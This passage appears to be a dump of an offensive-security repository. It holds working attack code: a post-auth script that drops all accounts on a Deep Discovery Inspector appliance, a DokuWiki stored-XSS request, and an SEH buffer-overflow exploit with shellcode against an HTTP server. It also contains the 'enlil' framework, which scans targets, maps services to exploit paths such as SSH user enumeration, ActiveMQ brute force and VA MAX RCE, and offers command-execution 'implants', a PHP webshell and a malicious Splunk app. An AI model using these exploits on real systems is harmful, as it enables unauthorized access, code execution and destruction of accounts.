%s") % (repID, repName)
181 |
182 | runme = subprocess.call([getRep],shell=True)
183 |
184 | print '[+] Report should be done in : ' + GREEN + str(repName) + ENDC
185 | # todo: check via sth like ls-la if rep.pdf is there
186 |
187 | print '[+] Thanks. Cheers!\n'
188 | #print ' Have fun ;)\n'
189 |
190 | except NameError, e:
191 | print RED + '[-] TargetID already exists, try different target host/IP' + ENDC
192 | print e
193 | pass
194 |
--------------------------------------------------------------------------------
/dcisoft-1.21-exp-0xdeff4c9d.0xda8adb89.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/dcisoft-1.21-exp-0xdeff4c9d.0xda8adb89.zip
--------------------------------------------------------------------------------
/deedi_py.txt:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # (postauth) drop all accounts on remote DDI box
3 | # based on Deep Discovery Inspector (3.7.1096)
4 | #
5 |
6 | # to use this code:
7 | # - log in to your DDI (as admin and go to users tab)
8 | # - run deedi.py
9 | # - refresh your users-page.
10 | # done.
11 | #
12 | import requests
13 |
# One session so the cookie set by the login request is reused below.
s = requests.Session()
# NOTE(review): appliance address and admin credentials are hardcoded, and
# verify=False turns off TLS certificate validation on every request.
init_login = {
    'usrname':'admin',
    'passwd':'P@ssw0rd',
    'isCookieEnable':1,
    'action':'on',
    'wrong_passwd':'%3C%21--invalid_passwd_flag--%3E'
}
req = s.post('https://192.168.2.18/cgi-bin/logon.cgi', data=init_login, verify=False)
resp1 = req.text
# Login success is inferred from the frame.cgi path showing up in the body.
if '../cgi-bin/frame.cgi' in resp1:
    print 'logged in. next step...'

# NOTE(review): indentation was lost in this listing; whether the rest of the
# script was nested under the login check cannot be recovered from here —
# confirm against the original. As reconstructed it runs regardless of the
# login result.
newreq = 'https://192.168.2.18/php/user_add.php'
# Hex-decoded: the UTF-8 byte-order mark (ef bb bf) followed by "bla".
bomb = "efbbbf626c61".decode("hex")
user = 'tester3'
crashddi = {
    'do_action':'add',
    'id':user+bomb
}

print bomb

# No timeout and no status check; the response body is discarded.
req2 = s.post(newreq, data=crashddi, verify=False)
#print req2.text
print 'done'
40 |
41 | ## code610@11.01.2018
42 | ##
43 | # o/
44 |
45 |
--------------------------------------------------------------------------------
/dokuwiki-2018-04-22b-xss.txt:
--------------------------------------------------------------------------------
1 | POST /doku.php HTTP/1.1
2 | Host: 192.168.1.49
3 | Content-Length: 7726
4 | Cache-Control: max-age=0
5 | Origin: http://192.168.1.49
6 | Upgrade-Insecure-Requests: 1
7 | Content-Type: application/x-www-form-urlencoded
8 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
9 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
10 | Referer: http://192.168.1.49/doku.php?id=start&do=admin&page=config
11 | Accept-Encoding: gzip, deflate
12 | Accept-Language: en-US,en;q=0.9
13 | Cookie: DokuWiki=8h3a23e7c2lnhj6q3g69bcb17l; DW68700bfd16c2027de7de74a5a8202a6f=dXNlcg%3D%3D%7C0%7C0pDGaOqk89XqSSg6qfAn1i6oHNRYzJbctgXDGkKcqv0%3D; DOKU_PREFS=list%23thumbs%23ext_enabled%231%23ext_disabled%231%23ext_updatable%231
14 | Connection: close
15 |
16 | id=start§ok=7d0965a15bb314aefc1866dfb6870d3e&config%5Btitle%5D=user's%20DokuWiki!%7d%7dsc94n%3cscript%3econfirm(1)%3c%2fscript%3epnhi4&config%5Bstart%5D=start&config%5Blang%5D=en&config%5Btagline%5D=&config%5Bsidebar%5D=sidebar&config%5Blicense%5D=cc-by-nc-sa&config%5Bsavedir%5D=%2Fopt%2Fbitnami%2Fapps%2Fdokuwiki%2Fhtdocs%2Fdata&config%5Bbasedir%5D=&config%5Bbaseurl%5D=&config%5Bcookiedir%5D=&config%5Bdmode%5D=0755&config%5Bfmode%5D=0644&config%5Brecent%5D=20&config%5Brecent_days%5D=7&config%5Bbreadcrumbs%5D=10&config%5Btypography%5D=1&config%5Bdformat%5D=%25Y%2F%25m%2F%25d+%25H%3A%25M&config%5Bsignature%5D=+---+%2F%2F%5B%5B%40MAIL%40%7C%40NAME%40%5D%5D+%40DATE%40%2F%2F&config%5Bshowuseras%5D=loginname&config%5Btoptoclevel%5D=1&config%5Btocminheads%5D=3&config%5Bmaxtoclevel%5D=3&config%5Bmaxseclevel%5D=3&config%5Bdeaccent%5D=1&config%5Buseheading%5D=0&config%5Bhidepages%5D=&config%5Buseacl%5D=1&config%5Bautopasswd%5D=1&config%5Bauthtype%5D=authplain&config%5Bpasscrypt%5D=smd5&config%5Bdefaultgroup%5D=user&config%5Bsuperuser%5D=%40admin&config%5Bmanager%5D=%21%21not+set%21%21&config%5Bprofileconfirm%5D=1&config%5Brememberme%5D=1&config%5Bdisableactions%5D%5Bother%5D=&config%5Bauth_security_timeout%5D=900&config%5Bsecurecookie%5D=1&config%5Bremoteuser%5D=%21%21not+set%21%21&config%5Busewordblock%5D=1&config%5Brelnofollow%5D=1&config%5Bindexdelay%5D=60*60*24*5&config%5Bmailguard%5D=hex&config%5Biexssprotect%5D=1&config%5Busedraft%5D=1&config%5Blocktime%5D=15*60&config%5Bcachetime%5D=60*60*24&config%5Btarget____wiki%5D=&config%5Btarget____interwiki%5D=&config%5Btarget____extern%5D=&config%5Btarget____media%5D=&config%5Btarget____windows%5D=&config%5Bmediarevisions%5D=1&config%5Bgdlib%5D=2&config%5Bim_convert%5D=&config%5Bjpg_quality%5D=70&config%5Bfetchsize%5D=0&config%5Brefcheck%5D=1&config%5Bsubscribe_time%5D=24*60*60&config%5Bnotify%5D=&config%5Bregisternotify%5D=&config%5Bmailfrom%5D=&config%5Bmailreturnpath%5D=&config%5Bmailprefix%5D=&config%5Bhtmlmail%5D=1&co
nfig%5Bsitemap%5D=0&config%5Brss_type%5D=rss1&config%5Brss_linkto%5D=diff&config%5Brss_content%5D=abstract&config%5Brss_media%5D=both&config%5Brss_update%5D=5*60&config%5Brss_show_summary%5D=1&config%5Bupdatecheck%5D=1&config%5Buserewrite%5D=0&config%5Bsepchar%5D=_&config%5Bfnencode%5D=url&config%5Bcompress%5D=1&config%5Bcssdatauri%5D=512&config%5Bcompression%5D=gz&config%5Bxsendfile%5D=0&config%5Breaddircache%5D=0&config%5Bsearch_nslimit%5D=0&config%5Bsearch_fragment%5D=exact&config%5Bdnslookups%5D=1&config%5Bjquerycdn%5D=0&config%5Bproxy____host%5D=&config%5Bproxy____port%5D=&config%5Bproxy____user%5D=&config%5Bproxy____pass%5D=&config%5Bproxy____except%5D=&config%5Bftp____host%5D=localhost&config%5Bftp____port%5D=21&config%5Bftp____user%5D=user&config%5Bftp____pass%5D=&config%5Bftp____root%5D=%2Fhome%2Fuser%2Fhtdocs&config%5Bplugin____authmysql____server%5D=&config%5Bplugin____authmysql____user%5D=&config%5Bplugin____authmysql____password%5D=&config%5Bplugin____authmysql____database%5D=&config%5Bplugin____authmysql____charset%5D=utf8&config%5Bplugin____authmysql____debug%5D=0&config%5Bplugin____authmysql____TablesToLock%5D=&config%5Bplugin____authmysql____checkPass%5D=&config%5Bplugin____authmysql____getUserInfo%5D=&config%5Bplugin____authmysql____getGroups%5D=&config%5Bplugin____authmysql____getUsers%5D=&config%5Bplugin____authmysql____FilterLogin%5D=&config%5Bplugin____authmysql____FilterName%5D=&config%5Bplugin____authmysql____FilterEmail%5D=&config%5Bplugin____authmysql____FilterGroup%5D=&config%5Bplugin____authmysql____SortOrder%5D=&config%5Bplugin____authmysql____addUser%5D=&config%5Bplugin____authmysql____addGroup%5D=&config%5Bplugin____authmysql____addUserGroup%5D=&config%5Bplugin____authmysql____delGroup%5D=&config%5Bplugin____authmysql____getUserID%5D=&config%5Bplugin____authmysql____delUser%5D=&config%5Bplugin____authmysql____delUserRefs%5D=&config%5Bplugin____authmysql____updateUser%5D=&config%5Bplugin____authmysql____UpdateLogin%5D=&config%5Bplugin__
__authmysql____UpdatePass%5D=&config%5Bplugin____authmysql____UpdateEmail%5D=&config%5Bplugin____authmysql____UpdateName%5D=&config%5Bplugin____authmysql____UpdateTarget%5D=&config%5Bplugin____authmysql____delUserGroup%5D=&config%5Bplugin____authmysql____getGroupID%5D=&config%5Bplugin____smtp____smtp_host%5D=localhost&config%5Bplugin____smtp____smtp_port%5D=25&config%5Bplugin____smtp____smtp_ssl%5D=&config%5Bplugin____smtp____auth_user%5D=&config%5Bplugin____smtp____auth_pass%5D=&config%5Bplugin____smtp____localdomain%5D=&config%5Bplugin____authldap____server%5D=&config%5Bplugin____authldap____port%5D=389&config%5Bplugin____authldap____usertree%5D=&config%5Bplugin____authldap____grouptree%5D=&config%5Bplugin____authldap____userfilter%5D=&config%5Bplugin____authldap____groupfilter%5D=&config%5Bplugin____authldap____version%5D=2&config%5Bplugin____authldap____referrals%5D=-1&config%5Bplugin____authldap____deref%5D=0&config%5Bplugin____authldap____binddn%5D=&config%5Bplugin____authldap____bindpw%5D=&config%5Bplugin____authldap____userscope%5D=sub&config%5Bplugin____authldap____groupscope%5D=sub&config%5Bplugin____authldap____userkey%5D=uid&config%5Bplugin____authldap____groupkey%5D=cn&config%5Bplugin____authldap____modPass%5D=1&config%5Bplugin____authpgsql____server%5D=&config%5Bplugin____authpgsql____port%5D=5432&config%5Bplugin____authpgsql____user%5D=&config%5Bplugin____authpgsql____password%5D=&config%5Bplugin____authpgsql____database%5D=&config%5Bplugin____authpgsql____checkPass%5D=&config%5Bplugin____authpgsql____getUserInfo%5D=&config%5Bplugin____authpgsql____getGroups%5D=&config%5Bplugin____authpgsql____getUsers%5D=&config%5Bplugin____authpgsql____FilterLogin%5D=&config%5Bplugin____authpgsql____FilterName%5D=&config%5Bplugin____authpgsql____FilterEmail%5D=&config%5Bplugin____authpgsql____FilterGroup%5D=&config%5Bplugin____authpgsql____SortOrder%5D=&config%5Bplugin____authpgsql____addUser%5D=&config%5Bplugin____authpgsql____addGroup%5D=&config%5Bplugin____authpg
sql____addUserGroup%5D=&config%5Bplugin____authpgsql____delGroup%5D=&config%5Bplugin____authpgsql____getUserID%5D=&config%5Bplugin____authpgsql____delUser%5D=&config%5Bplugin____authpgsql____delUserRefs%5D=&config%5Bplugin____authpgsql____updateUser%5D=&config%5Bplugin____authpgsql____UpdateLogin%5D=&config%5Bplugin____authpgsql____UpdatePass%5D=&config%5Bplugin____authpgsql____UpdateEmail%5D=&config%5Bplugin____authpgsql____UpdateName%5D=&config%5Bplugin____authpgsql____UpdateTarget%5D=&config%5Bplugin____authpgsql____delUserGroup%5D=&config%5Bplugin____authpgsql____getGroupID%5D=&config%5Bplugin____authpdo____dsn%5D=&config%5Bplugin____authpdo____user%5D=&config%5Bplugin____authpdo____pass%5D=&config%5Bplugin____authpdo____select-user%5D=&config%5Bplugin____authpdo____check-pass%5D=&config%5Bplugin____authpdo____select-user-groups%5D=&config%5Bplugin____authpdo____select-groups%5D=&config%5Bplugin____authpdo____insert-user%5D=&config%5Bplugin____authpdo____delete-user%5D=&config%5Bplugin____authpdo____list-users%5D=&config%5Bplugin____authpdo____count-users%5D=&config%5Bplugin____authpdo____update-user-info%5D=&config%5Bplugin____authpdo____update-user-login%5D=&config%5Bplugin____authpdo____update-user-pass%5D=&config%5Bplugin____authpdo____insert-group%5D=&config%5Bplugin____authpdo____join-group%5D=&config%5Bplugin____authpdo____leave-group%5D=&config%5Bplugin____authad____account_suffix%5D=&config%5Bplugin____authad____base_dn%5D=&config%5Bplugin____authad____domain_controllers%5D=&config%5Bplugin____authad____sso_charset%5D=&config%5Bplugin____authad____admin_username%5D=&config%5Bplugin____authad____admin_password%5D=&config%5Bplugin____authad____expirywarn%5D=0&config%5Bplugin____authad____additional%5D=&do=admin&page=config&save=1&submit=
--------------------------------------------------------------------------------
/edrawmax-sploitable-pack.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/edrawmax-sploitable-pack.zip
--------------------------------------------------------------------------------
/effs-rce-poc.py:
--------------------------------------------------------------------------------
1 | c@kali:~/easyhackttp$ cat r8.py
2 | #!/usr/bin/env python
3 |
4 | import socket
5 | import sys
6 |
# Target host is the first CLI argument; the port is fixed at 80.
target = str(sys.argv[1])
port = 80

req = socket.socket()
print "Connecting to: %s:%s" % ( target, port )
req.connect((host,port))


shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
"\x1c\x39\xbd"
)

print len(shellcode)

# The request path is filler, a 4-byte NSEH/SEH pair, 19 NOP bytes, the
# payload and trailing padding — about 4.5 KB in total. From a detection
# standpoint the observable artifact is a GET request line of that size
# carrying non-printable bytes.
buffbuff = 'A'*4061
buffbuff += '\xeb\x07\x90\x90' # NSEH
buffbuff += '\xd4\xb1\x01\x10' # SEH
buffbuff += '\x90'*19
buffbuff += shellcode
buffbuff += 'D'*312 # padding

# GETme
req.send("GET " + buffbuff + " HTTP/1.0\r\n\r\n")

req.close()

print "Done..."
41 | c@kali:~/easyhackttp$
42 |
--------------------------------------------------------------------------------
/enlil:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/enlil-v0.2/enlil.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # enlil - v0.2
3 | #
4 | # 26.05.2019 @ 00:28
5 | # full tutorial: https://www.youtube.com/watch?v=cQWu4B6mV2Q
6 | # have fun ;]
7 | #
8 |
9 | # --- imports ---
10 | import sys
11 |
12 | # --- defines ---
13 | from pymongo import MongoClient
14 |
15 | sys.path.append('./files')
16 | import core
17 |
18 |
19 | ## --- functions ---
def main():
    """Print the banner, hand control to the interactive menu, then say bye."""
    core.banner()
    core.menu()
    print('\nThanks, bye! o/\n')
25 |
26 |
27 | ## --- main ---
if __name__ == '__main__':
    # Only start the interactive menu when run as a script, not on import.
    main()
30 |
31 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/core.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # This Python file uses the following encoding: utf-8
3 | # core.py - main function(s) for our starter...
4 | #
5 | # - 26.05.2019 @ 10:56
6 | #
7 | # detailed tutorial:
8 | # https://www.youtube.com/watch?v=S1j4K_D3ZQo
9 | #
10 |
11 | # --- imports ---
12 | import sys
13 | sys.path.append('files')
14 | import datetime
15 | import os
16 | import subprocess
17 | #from pymongo import MongoClient
18 | from stomp import * # for STOMP protocol
19 | import stomp
20 |
21 |
22 | # --- paths/implants ---
23 | import path01 # openssh enum bug
24 | import path02 # kibana getversion
25 | import path03 # testing elasticsearch
26 | import path04 # testing oracle tns listener
27 | import path05 # testing splunk
28 | import path06 # testing influxdb
29 | import path07 # testing mongodb
30 | import path08 # testing pcp
31 | import path09 # testing mysql
32 | import path10 # testing prometheus # (still todo)
33 | import path11 # testing active mq web console (8191) / stomp
34 | import path12 # testing vamax 8.x rce
35 | import path13 # testing activemq - admin panel
36 | import path14 # testing JDWP protocol
37 |
38 | import implants
39 | # ...wanna more?
40 |
41 | # --- defines ---
# Captured once at import time; banner() prints current_date next to the logo.
now = datetime.datetime.now()
current_date = now.strftime("%d.%m.%Y %H:%M")
44 |
45 | # --- super colours ---
# ANSI SGR escape sequences for coloured terminal output. ENDC resets the
# attributes; the print calls below pair a colour with ENDC.
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
54 |
55 |
56 |
57 | ## --- functions ---
def banner():
    """Print the coloured ENLIL logo with the start-up timestamp on its first row."""
    rows = [
        ' ███████╗███╗ ██╗██╗ ██╗██╗ (' + str(current_date) + ')',
        ' ██╔════╝████╗ ██║██║ ██║██║ ',
        ' █████╗ ██╔██╗ ██║██║ ██║██║ ',
        ' ██╔══╝ ██║╚██╗██║██║ ██║██║ ',
        ' ███████╗██║ ╚████║███████╗██║███████╗ ',
        ' ╚══════╝╚═╝ ╚═══╝╚══════╝╚═╝╚══════╝ ',
    ]
    print(WARNING + '\n')
    for row in rows:
        print(row)
    print(ENDC)
73 |
74 | ##
75 |
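def menu():
    """Interactive main menu; loops until the user picks 'q'.

    Each numbered choice runs one module and then shows the menu again.
    The original re-entered menu() recursively after every choice, which
    grows the call stack with each selection and eventually hits the
    interpreter's recursion limit in a long session; a loop has the same
    visible behaviour without that.
    """
    actions = {
        '1': scan_target,     # 1] scan
        '2': readlog_target,  # 2] readlog
        '3': path_target,     # 3] path
        '4': implants.run,    # 4] implant
    }
    while True:
        print(OKBLUE + ' Ask me for:' + ENDC)
        print(' ' + UNDERLINE + '1] scan' + ENDC)
        print(' ' + UNDERLINE + '2] readlog' + ENDC)
        print(' ' + UNDERLINE + '3] path' + ENDC)
        print(' ' + UNDERLINE + '4] implant' + ENDC)
        print('')
        choice = raw_input(' > ')
        print('')

        if choice == 'q':
            print(FAIL + ' \n Well... bye :7\n' + ENDC)
            sys.exit(0)

        if choice not in actions:
            print(BOLD + ' [-] wrong, again Neo\n' + ENDC)
            continue

        print(OKGREEN + ' [+] your choice: ' + choice + ENDC)
        if choice == '1':
            print(' [+] preparing scan...')
        actions[choice]()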
114 |
115 |
116 | ##
117 |
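def scan_target():
    """Ask for a target, make sure its log directory exists, run the nmap scan.

    The target is used both as a directory name (via prepare_env) and as an
    nmap argument, so it is restricted to hostname/IP characters and the
    command is run as an argument list with shell=False. The original
    spliced the raw input into a shell=True command string, so shell
    metacharacters in the input could alter the command.
    """
    print(OKBLUE)
    target = raw_input(' target[IP]> ')
    print(ENDC)

    # Hostnames and IPv4/IPv6 literals only: letters, digits, '.', '-', ':'.
    # A leading '-' is rejected so the value cannot be parsed as an nmap option.
    if (not target or target.startswith('-')
            or not all(ch.isalnum() or ch in '.-:' for ch in target)):
        print(FAIL + ' [-] invalid target, use a hostname or IP address\n' + ENDC)
        return

    # check/prepare env (if needed)
    prepare_env(target)

    # run the scan when all settings/env are ready; same options as before
    log_file = os.path.join('.', target, target + '.log')
    cmd = [
        'nmap', '-sV', '-vvv', '-n', '--top-ports', '15000', '-Pn',
        '--max-retries', '1', '--min-rate', '120', '-oN', log_file, target,
    ]
    subprocess.call(cmd)

    print('\n')
    print(OKGREEN + ' [i] Scan module finished.\n' + ENDC)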
134 |
135 | ##
136 |
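def prepare_env(target):
    """Ensure ./<target>/ exists under the current working directory.

    Args:
        target: host/IP string that names the per-target log directory.
            Only a single plain path component is accepted, so a value such
            as '../x' or 'a/b' cannot create or reuse a directory outside
            the current one.

    Raises:
        ValueError: if target is empty, '.', '..' or contains a separator.
        OSError: if the directory cannot be created for any reason other
            than already existing (the original reported every OSError as
            "already there").
    """
    import errno  # local import keeps the module's import block unchanged

    # Validate before any output so callers get a clean error.
    if not target or target in ('.', '..') or os.path.basename(target) != target:
        raise ValueError('invalid target name: %r' % (target,))

    print(BOLD + ' [i] checking env for target: ' + target + ENDC)

    pwd = os.getcwd()
    print(OKGREEN + ' [+] pwd: ' + pwd + ENDC)

    # checking for target logdir
    targetLogDir = os.path.join(pwd, target)
    if os.path.exists(targetLogDir):
        print(OKGREEN + ' [+] Target logdir exists, skip' + ENDC)
    else:
        try:
            os.mkdir(targetLogDir)
            print(OKGREEN + ' [+] Log directory created : ' + targetLogDir + ENDC)
        except OSError as e:
            # Only EEXIST is benign; permissions or a file of that name are
            # real failures and must not be reported as success.
            if e.errno != errno.EEXIST:
                raise
            print(OKGREEN + ' [+] Log directory is already there' + ENDC)

    print('\n')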
156 |
157 | ##
158 |
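def readlog_target():
    """Ask for a target and print the open TCP ports found in its nmap log.

    Reads ./<target>/<target>.log as written by scan_target(). prepare_env()
    is called first, as before, so a missing directory is created rather
    than failing later. Lines are matched on the '/tcp' and 'open'
    substrings exactly as the original did.

    Changes from the original: the log file is closed deterministically
    (it was never closed), and a missing log is reported instead of
    raising an uncaught IOError out of the menu.
    """
    pwd = os.getcwd()

    # first of all: check for target's env
    print(OKBLUE)
    read_target = raw_input(' > Read target[IP]> ')
    print(ENDC)

    # checking for env for our target; must be scanned first of log
    # should be placed 'manually'
    prepare_env(read_target)

    print('\n')
    print('------------------------------------------------')
    print(BOLD + ' [i] Found open port(s):' + ENDC)
    print('------------------------------------------------')

    # find open ports now
    targetLogFile = os.path.join(pwd, read_target, read_target + '.log')
    try:
        with open(targetLogFile, 'r') as fp:
            for line in fp:
                if '/tcp' in line and 'open' in line:
                    print(' [open port]: ' + line.rstrip())
    except IOError as e:
        print(FAIL + ' [-] cannot read log file ' + targetLogFile + ': ' + str(e) + ENDC)

    print('\n')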
187 |
188 | ##
189 |
def path_target():
    # Read one target's nmap log, print a "path" hint for every banner/port
    # the log matches, then dispatch on the path number the user picks.
    pwd = os.getcwd()

    print OKBLUE
    # readl log for specific target and prepare some useful path(s)
    target = raw_input(' target[IP]> ')
    print ENDC

    # prepare_env(target) # if needed
    print '\n'
    print BOLD + ' [i] Found possible path(s):' + ENDC
    targetLogFile = pwd + '/' + target + '/' + target + '.log'


    # NOTE(review): the handle is never closed, and a missing log raises an
    # uncaught IOError here.
    fp = open(targetLogFile, 'r')
    lines = fp.readlines()

    path_num = 0  # NOTE(review): assigned but never used
    print HEADER
    for line in lines:
        # One hint per log line: the first matching branch wins.
        if line.find('OpenSSH') != -1:
            substring = "OpenSSH"
            string = line # ex. "Banner 22/tcp OpenSSH 7.7p321"
            # NOTE(review): 'OpenSSH 7.' also matches later 7.x releases, so
            # this hint over-reports; it is a prefix check, not a version compare.
            substring_list = ['OpenSSH 5.','OpenSSH 6.','OpenSSH 7.7','OpenSSH 7.']
            vulnerable = any(substring in string for substring in substring_list)
            #print vulnerable

            if vulnerable == True:
                print ' [path 01]> possibly openssh user enum bug'
                # run pocssh now

        elif line.find('5601/tcp') != -1:
            print ' [path 02]> kibana webapp'

        elif line.find('9200/tcp') != -1:
            print ' [path 03a]> ElasticSearch at 9200 - check version'

        # NOTE(review): same condition as the branch above, so this branch is
        # unreachable and the 03b hint is never printed.
        elif line.find('9200/tcp') != -1:
            print ' [path 03b]> ElasticSearch at 9200 - preauth search'

        elif line.find('Oracle TNS listener') != -1:
            if line.find('unauthorized') != -1:
                print ' [path 04] Oracle TNS listener found'

        elif line.find('8000/tcp') != -1:
            if line.find('CherryPy httpd') != -1:
                print ' [path 05a] Splunk get version (default: 8000/tcp)'

        elif line.find('8089/tcp') != -1:
            print ' [path 05b] Splunk REST API check (default: 8089/tcp)'

        elif line.find('InfluxDB') != -1:
            print ' [path 06] InfluxDB - preauth get DB\'s'

        elif line.find('8086/tcp') != -1:
            print ' [path 06] InfluxDB - preauth get DB\'s'

        elif line.find('MongoDB') != -1:
            print ' [path 07a] MongoDB found' # run# apt-get install python-pymongo
            print ' [path 07b] MongoDB - postauth list '

        elif line.find('44321/tcp') != -1:
            print ' [path 08] PCP found online' # run# apt-get install pcp-manager

        elif line.find('MySQL') != -1:
            if line.find('unauthorized') != -1:
                print ' [path 09] MySQL found unauthorized'

        elif line.find('Go-IPFS json-rpc or InfluxDB API') != -1:
            if line.find('9090/tcp') != -1: # default for Prometheus
                print ' [path 10] Go-IPFS json-rpc/InfluxDB API/Prometheus - found'

        elif line.find('8161/tcp') != -1:
            print ' [path 11] Active MQ - Web Console found'

        elif line.find('9080/tcp') != -1:
            print ' [path 12] VA MAX (8.3.x) - possible RCE'

        elif line.find('61616') != -1: # 61613-6/tcp
            print ' [path 13] ActiveMQ STOMP found'

        # NOTE(review): '5005' is matched anywhere in the line, not only as
        # a port field, so e.g. a version string containing it also hits.
        elif line.find('5005') != -1: # default jdwp
            print ' [path 14] JDWP service found open'
        elif line.find('JWDP') != -1: # TODO: ;]
            print ' [path 14] JDWP service found open'


        # next...

    print ENDC # of HEADER for path(s)
    print OKGREEN + ' [+] searching for path(s) - finished.\n' + ENDC

    print BOLD
    try_path = raw_input(' [?] Path to try> ')
    print ENDC

    # Dispatch table by path number; unknown input falls through to the
    # error message below.
    if try_path == '1' : path01.enum() # path01: ssh enum bug
    elif try_path == '2' : path02.getversion() # path02: kibana webapp
    elif try_path == '3a' : path03.getversion() # path03a: elasticsearch on 9200
    elif try_path == '3b' : path03.preauth_search() # path03b: elasticsearch preauth search
    elif try_path == '4' : path04.tnscmds() # path04: preauth tns listener, ver, stat
    elif try_path == '5a' : path05.getversion() # path05a: testing splunk at 8000/tcp
    elif try_path == '5b' : path05.getrest() # path05b: testing splunk at 8089/tcp
    elif try_path == '6' : path06.getDBs() # path06: influxdb - get databases
    elif try_path == '7a' : path07.preauthlist() # path07: preauth list available DB's
    elif try_path == '7b' : path07.postauthlist() # path07: postauth list available DB's
    elif try_path == '8' : path08.getstats() # path08: pcp stats online
    elif try_path == '9' : path09.getdbs() # path09: testing mysql
    # elif try_path == '10' : path10.getinfo() # path10: prometheus - getinfo
    elif try_path == '11' : path11.getadminlogin() # path11: active mq web console small bf test
    elif try_path == '12' : path12.getrce() # path12: vamax 8.3.x rce
    elif try_path == '13a': path13.bf() # admin panel bf activemq
    elif try_path == '13b': path13.sender() # stomp sender activemq
    elif try_path == '14' : path14.gotleak() # path14: testing jdwp

    # ...
    else:
        print FAIL + ' Don\'t play with me.\n' + ENDC


    print '\n'
    # NOTE(review): re-enters the main menu from inside a menu choice, so
    # each visit to this path nests one more menu() frame.
    menu() # # goto 'main' starter: menu()
312 |
313 | ##
314 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/implants.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # implants.py - core file for implants
3 | #
4 | # current:
5 | # - local:
6 | # - splunk app
7 | # - remote:
8 | # - ...
9 | #
10 | #
11 |
12 | # --- imports ---
13 | import subprocess
14 | import re
15 | import sys
16 | import requests
17 | import random
18 | import string
19 | import socket
20 |
21 | # from files if needed
22 | sys.path.append('files')
23 | import core
24 |
25 | # --- super colours ---
# ANSI SGR escape sequences for coloured terminal output. ENDC resets the
# attributes; the print calls in this module pair a colour with ENDC.
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
34 |
35 |
36 |
def run(): # main for preparing implants
    """Ask for an implant group ('local' or 'remote') and dispatch to it.

    Anything else prints an error and returns to the main menu.
    """
    print(OKBLUE)
    #target = raw_input(' target[IP]> ')
    #print ENDC

    make_implant = raw_input(' Type (local, remote)> ')
    print(ENDC)

    handlers = {
        'remote': implant_remote,
        'local': implant_local,
    }
    handler = handlers.get(make_implant)
    if handler is None:
        print(FAIL + ' [-] no such implant group, sorry.\n' + ENDC)
        core.menu() # starter() # goto main if you don't know what you're doing
        return

    print(OKGREEN)
    print(' [+] implant: ' + make_implant)
    print(ENDC)
    handler()
61 |
62 | ##
63 |
def implant_remote():
    # Single GET probe: the user supplies scheme, host, port, path and the
    # query parameter name; the script appends 'id' as the parameter value
    # and prints the raw response body, then returns to the main menu.

    # todo: one or more sample requests to try... ;S
    # below it's only basic one (as usual, sorry)
    print '\n' + BOLD
    print ' [implant:remote]'
    target = raw_input(' [retype target/ip]: ')
    shttp = raw_input(' [http/https]: ')
    port = raw_input(' [port]: ')
    urlpath = raw_input(' [rcepath]: ')
    param = raw_input(' [param]: ')
    #method = raw_input(' [method]: ')
    print ' [method]: GET' # todo ;)
    cmd = 'id'
    print ENDC

    # NOTE(review): no timeout is set, and connection errors propagate out
    # of the menu uncaught.
    preparing = shttp + '://'+target+':'+port+'/'+urlpath+'?'+param+'=' + cmd
    req = requests.get(preparing)
    resp = req.text

    print ' -- resp --\n'
    print resp
    print ' -- end of resp --\n'

    ## finished, so goto starter()
    core.menu() # starter()
90 |
91 | ##
92 |
def implant_local():
    """Show the local-implant sub-menu and run the chosen generator.

    Option 'a' is only a placeholder in this version; unknown input prints
    an error and returns to the main menu.
    """
    print('\n' + BOLD + ' [implant:local]\n')

    # prepare local file to use it as revshell/backdoor/etc
    print('')
    print(' -- implants - local menu --')
    print('')
    print(' [a] PHP webshell - simple file (win/lin)') # to fix
    print(' [b] Splunk evil app (lin)')
    print(' [c] receive some answers from remote port')
    print('')

    # print ' [e] getRes'...
    print('' + ENDC)

    choice = raw_input(' >> ')
    print(' ---- ---- ---- ---- ----')
    print(OKGREEN + '\n [+] Ok, let\'s do this! :)\n' + ENDC)

    labels = {
        'a': ' [+] PHP webshell - simple file (win/lin)',
        'b': ' [+] Splunk evil app (lin)',
        'c': ' [+] receive some answers from remote port',
    }
    if choice not in labels:
        print(FAIL + '[-] wrong. try again next year.\n' + ENDC)
        core.menu() # starter() # goto 'main()'
        return

    print(OKGREEN + labels[choice] + ENDC)
    print('')
    if choice == 'b':
        splunk_evil_app()
    elif choice == 'c':
        receive_port()
    # 'a' has no generator yet: ... todo: ...implant_local_a()
130 |
131 |
132 | ## ---
133 | # our super implants:
134 | #
135 |
def splunk_evil_app():
